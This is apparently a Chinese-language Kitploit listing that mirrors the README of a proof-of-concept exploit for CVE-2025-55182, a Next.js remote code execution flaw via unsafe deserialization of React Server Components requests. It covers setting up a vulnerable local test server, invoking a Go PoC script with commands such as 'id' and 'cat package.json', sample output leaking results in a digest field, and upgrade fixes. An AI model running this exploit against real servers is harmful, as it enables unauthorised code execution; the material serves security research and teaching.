Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — CVE-2025-55182 的概念验证利用程序,这是一个通过 RSC 请求中的不安全反序列化实现的 Next.js RCE 漏洞。包含一个基于 Go 的 POC 脚本和一个用于安全研究和教育的易受攻击的测试服务器。 | Kitploit
工具/GitHubGitHub/hoosin/cve-2025-55182
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubhoosin/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 的概念验证利用程序,这是一个通过 RSC 请求中的不安全反序列化实现的 Next.js RCE 漏洞。包含一个基于 Go 的 POC 脚本和一个用于安全研究和教育的易受攻击的测试服务器。

查看仓库
329个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 Next.js RCE 复现指南

免责声明

⚠️ 本工具仅供安全研究和教学使用。请勿用于非法用途。 ⚠️

漏洞简介

CVE-2025-55182 是 Next.js 框架中的一个严重远程代码执行 (RCE) 漏洞。该漏洞源于 Next.js 在处理 React Server Components (RSC) 请求时存在不安全的反序列化问题。攻击者可以通过构造恶意的 HTTP 请求,在未授权的情况下在服务器上执行任意代码。

影响版本:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • 以及部分 Canary 版本

环境搭建

本项目提供了一个易受攻击的 Next.js 测试服务器 test-server。

1. 启动测试服务器

确保你已经安装了 Node.js 和 npm。

root@kitploit:~
cd test-server
npm install
npm run dev

服务器默认运行在 http://localhost:3000。

注意: 如果遇到 lock 文件错误,可以尝试运行:

root@kitploit:~
rm -f .next/dev/lock && npm run dev

漏洞复现 (POC)

本项目提供了 Go 语言的 POC 脚本 poc.go。

使用 Go 脚本

用法:

root@kitploit:~
go run poc.go [目标URL] [要执行的命令]

示例:

  1. 执行 id 命令 (默认)

    root@kitploit:~
    go run poc.go
    

    或者

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. 查看当前目录文件

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. 查看文件内容

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

预期输出: 虽然 HTTP 状态码返回 500,但命令执行结果会包含在响应的 digest 字段中。

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

修复建议

升级 Next.js 到安全版本:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
下载工具